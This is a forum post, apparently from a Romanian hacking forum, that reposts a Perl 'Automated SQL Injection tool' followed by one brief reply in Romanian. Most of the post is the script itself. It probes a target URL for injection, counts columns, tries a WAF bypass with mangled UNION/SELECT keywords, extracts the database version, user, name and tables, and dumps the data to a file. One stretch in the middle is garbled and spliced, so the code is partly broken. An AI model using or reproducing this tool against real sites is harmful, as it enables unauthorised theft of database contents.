[Source] STRING & UNION Based SQL Injection tool [PERL]

[Romania-]

#!usr/bin/perl

# Automated SQL Injection tool by Red_Hat

# Version: 2.0

# Injection Method:UNION Based & STRING based

$starts="";

$ends="";

use LWP::Simple;

print q{

____ _ __

/ _/___ (_)__ __/ /__ __

/ // __ \ / / _ \/ ___/ __/ __ \/ ___/

_/ // / / __/ /__/ /_/ /_/ / /

/___/_/ /_/_/ /\___/\___/\__/\____/_/

/___/

Automated SQL Injection tool by Red_Hat

};

if (!defined($ARGV[0])){

print q{

Usage : ./injector.pl http://site.com/page.php?id=1

};

exit;

}

$site=$ARGV[0];

# Check URL.

if ($site!~ m /http:/){

print "[!]Invalid URL.\n";

exit;

}

# URL valid.

# Check if site exists.

print "[+]Checking if '".$site."' exists...\n";

if (!head($site)){

print "[!]Site does not exist.\n";

exit;

}

# Site Exists

# Check URL Vulnerability

print "[+]Checking vulnerability of '".$site."'...\n";

$url=$site;

$url=~ s/=/=2'/;

#Check URL.

if ($url eq $site){

print "[!]Invalid URL.\n";

exit;

}

# URL Valid.

# Pentest URL.

$pentest=get($url);

$normal=get($site);

if ($pentest=~ m /SQL/ or $pentest=~ m /sql_fetch_array()/ or $pentest=~ m /Warning/ or $pentest=~ m /Error:/){

print "[*]Site is vulnerable.\n";

}

else{

$retry=get($site."'");

if ($retry=~ m /SQL/){

print "[*]Site is vulnerable.\n";

}

else{

print "[!]Site is not vulnerable.\n";

exit;

}

}

# URL Vulnerable.

# Check attack Method

print "[+]Checking attack method...\n";

$string=get($site."+order+by+red_hat--");

if ($string=~ m /column/ or $string=~ m /mysql_num_rows()/ or $string=~ m /Warning/ or $string=~ m/SQL/){

print "[+]Starting UNION based attack...\n";

}

else{

print "[+]Starting STRING based attack...\n";

$starts="'";

$ends="+";

}

# Method clear.

# Column count.

print "[+]Starting column count on '".$site."'...\n";

$column=1;

$pentest=get($site.$starts." +order+by+".$column."--".$ends);

while ($pentest!~ m /column/){

$column++;

$pentest=get($site.$starts."+order+by+".$column."--".$ends);

if ($pentest=~ m /Warning/ or $pentest=~ m /mysql_num_rows()/){

goto endwhileforcolumn;

}

}

endwhileforcolumn:

$column=$column-1;

if ($column==0){

print "[!]Could not extract number of columns ...\n";

exit;

}

print "[*]Number of columns : ".$column."...\n";

# End count.

# Extract vulnerable columns

$union=1;

$query="+and+0+union+select+concat(0x6c6f6c,1,0x6c6f6c)";

print "[+]Extracting vulnerable columns...\n";

while ($column > $union){

$union++;

$query=$query.",concat(0x6c6f6c,$union,0x6c6f6c)";

}

$query=$query."--";

$url=$site;

$url=~ s/=/=-/;

$pentest=get($url.$starts.$query.$ends);

@get=split(/lol/,$pentest);

$open="".$get[1]."";

if ($open-1 < 1){

if ($pentest=~ /The used SELECT statements have a different number of columns/){

print "[!]Error : The used SELECT statements have a different number of columns...\n";

exit;

}

print "[!]Could not extract vulnerable column...\n";

print "[+]Attempting to bypass WAF...\n";

&method;

if ($open-1 < 1){

print "[!]Could not bypass WAF and extract vulnerable columns...\n";

exit;

}

}

print "[*]Injecting through column : ".$open."...\n";

# Columns extracted.

# Generated counting string

$union=1;

$count="1";

while ($union < $column){

$union++;

if ($union==$open){

$count=$count.",OPEN";

}

else{

$count=$count.",".$union."";

}

}

# Counting string generated.

# Extract version

print "[+]Extracting database version...\n";

$query=$url.$starts."+uNiOn+SelECt+".$count."--".$ends;

$query=~ s/OPEN/group_concat(0x6c6f6c,version(),0x6c6f6c)/;

$pentest=get($query);

@get=split(/lol/,$pentest);

$version=$get[1];

print "[*]Database version extracted : ".$version."...\n";

# Version extracted.

# Make sure version is high enough

if ($pentest=~ m/lol4./){

print "[!]MySQL version is too low for a UNION based injection...\n";

exit;

}

# Version is high enough.

# Extract user

print "[+]Extracting database user...\n";

$query=$url.$starts."+uNioN+select+".$count."--".$ends;

$query=~ s/OPEN/group_concat(0x6c6f6c,user(),0x6c6f6c)/;

$pentest=get($query);

@get=split(/lol/,$pentest);

$user=$get[1];

print "[*]Database user extracted : ".$user."...\n";

# Dtabase user extracted.

# Extract current database

print "[+]Extracting current database...\n";

$query=$url.$starts."+UnIoN+select+".$count."--".$ends;

$query=~ s/OPEN/group_concat(0x6c6f6c,database(),0x6c6f6c)/;

$pentest=get($query);

@get=split(/lol/,$pentest);

$database=$get[1];

print "[*]Database extracted : ".$database."...\n";

# Database user extracted.

# Extract tables

print "[+]Extracting tables ...\n";

$query=$url.$starts."+uNiOn+select+".$count."+FROM+information_schema.tables+WHERE+table_schema=database()--".$ends;

$query=~ s/OPEN/(concat(0x6c6f6c,group_concat(table_name),0x6c6f6c))/;

$pentest=get($query);

@get=split(/lol/,$pentest);

@moREdata){

#!/usr/local/bin/perl

open (DUMP, '>>$site.txt');

print DUMP $table_name.">".$col.">".$datapart.">"."'".$_."'\n";

close(DUMP);

}

}

}

}

print "[*]Database dumped in '$site.txt'\n";

exit;

# Dumped!

sub method {

# Generated counting string

$union=1;

$count="1";

while ($union < $column){

$union++;

$count=$count.",".$union."";

}

$change=0;

while ($column > $change){

$change++;

$query=$count;

$query=~ s/$change,/group_concat(0x6c6f6c),/;

$pentest=get($url."$starts+/**/uniUNIONon/*+dIstInct+*/selSELECTect/**/+".$query."--".$ends);

if ($pentest=~ m/lol/){

$open=$change;

return;

}

}

# Counting string generated.

}

Source : http://www.hackforums.net/showthread.php?tid=3003669

[Ganav]

Se pare ca aceste posturi sunt scrise doar pentru post count/rep whoring. Iti recomand sa incetezi; este foarte probabil sa iei warn/ban daca continui astfel.